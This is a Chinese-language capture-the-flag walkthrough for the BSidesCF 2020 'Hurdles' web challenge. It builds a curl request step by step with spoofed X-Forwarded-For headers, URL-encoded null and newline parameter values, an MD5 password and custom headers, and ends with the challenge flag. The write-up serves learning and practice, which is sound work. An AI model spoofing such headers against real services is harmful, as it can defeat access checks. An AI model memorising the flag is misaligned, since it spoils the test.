BSidesCF 2020Hurdles
打开题目,题目提示访问/hurdles
所以输入/hurdles,返回提示讲要使用PUT请求方法
提示要在路径后面加上!
提示URL中没有?get=flag
提示在寻找&=&=&参数,所以将其进行url编码,得到:%26%3D%26%3D%26,构造传参:
提示要使&=&=&的值为%00,%00后还包含了一个换行符,也是进行URL编码 %2500%0a,构造传参:
需要指定认证,知道了用户名为player,但不知道密码,先随便猜测一个密码,使用-u参数指定:
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:player"
提示要求使用open sesame的MD5加密作为密码(54ef36ec71201fdf9d1423fd26f97f6b)
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b"
提示使用1337浏览器, 使用-A参数设置:
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser"
提示希望浏览器的版本超过9000 ,加上v.9000
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000"
提示这个转发给我,提示给出了X-Forwared-For,猜测将X-Forwared-For修改为127.0.0.1,使用-H参数添加HTTP请求头 X-Forwared-For:127.0.0.1
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwared-For:127.0.0.1"
提示需要使用代理,需要额外的代理转发,尝试使用1.1.1.1,构造传参
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwared-For:1.1.1.1,127.0.0.1"
需要通过13.37.13.37这个地址代理,将1.1.1.1替换
>curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1"
提示要有cookie, 猜测参数名为Fortune,使用参数-b
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1" -b "Fortune=1"
提示:抱歉,我原本期望Cookie中包含HTTPCookie(状态管理机制)RFC的编号,来自201
通过查看https://datatracker.ietf.org/doc/rfc6265/了解到2011版的RFC协议的值为6265,构造传参:
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1" -b "Fortune=6265"
提示:我期望您仅接受纯文本媒体 (MIME)类型, 依然通过-H参数添加请求头信息Accept:text/plain,构造传参:
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1" -b "Fortune=6265" -H "Accept:text/plain"
百度翻译
猜测其应该说的是Accept-Language请求头属性,查阅资料:语言代码缩写表大全(用于Accept-Language)
得到俄语的表示为ru,构造传参:
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1" -b "Fortune=6265" -H "Accept:text/plain" -H "Accept-Language:ru"
提示:抱歉,我本希望与源站https://ctf.bsidessf.net共享资源。-H "origin:https://ctf.bsidessf.net",构造传参
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1" -b "Fortune=6265" -H "Accept:text/plain" -H "Accept-Language:ru" -H "origin:https://ctf.bsidessf.net"
提示:很抱歉,我本以为你会通过https://ctf.bsidessf.net/challenges这条链接被引荐过来,使用Referer属性,添加请求头Referer:https://ctf.bsidessf.net/challenges,构造传参:
curl -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1" -b "Fortune=6265" -H "Accept:text/plain" -H "Accept-Language:ru" -H "origin:https://ctf.bsidessf.net" -H "Referer:https://ctf.bsidessf.net/challenges"
返回恭喜,但是没有flag, 猜测可能在返回的头信息中,添加-i参数,查看回显的头信息:
curl -i -X PUT "http://node5.buuoj.cn:26435/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a" -u "player:54ef36ec71201fdf9d1423fd26f97f6b" -A "1337 Browser v.9000" -H "X-Forwarded-For:13.37.13.37,127.0.0.1" -b "Fortune=6265" -H "Accept:text/plain" -H "Accept-Language:ru" -H "origin:https://ctf.bsidessf.net" -H "Referer:https://ctf.bsidessf.net/challenges"
flag{a69de611-fec9-416d-be1c-7b4836ecafe9}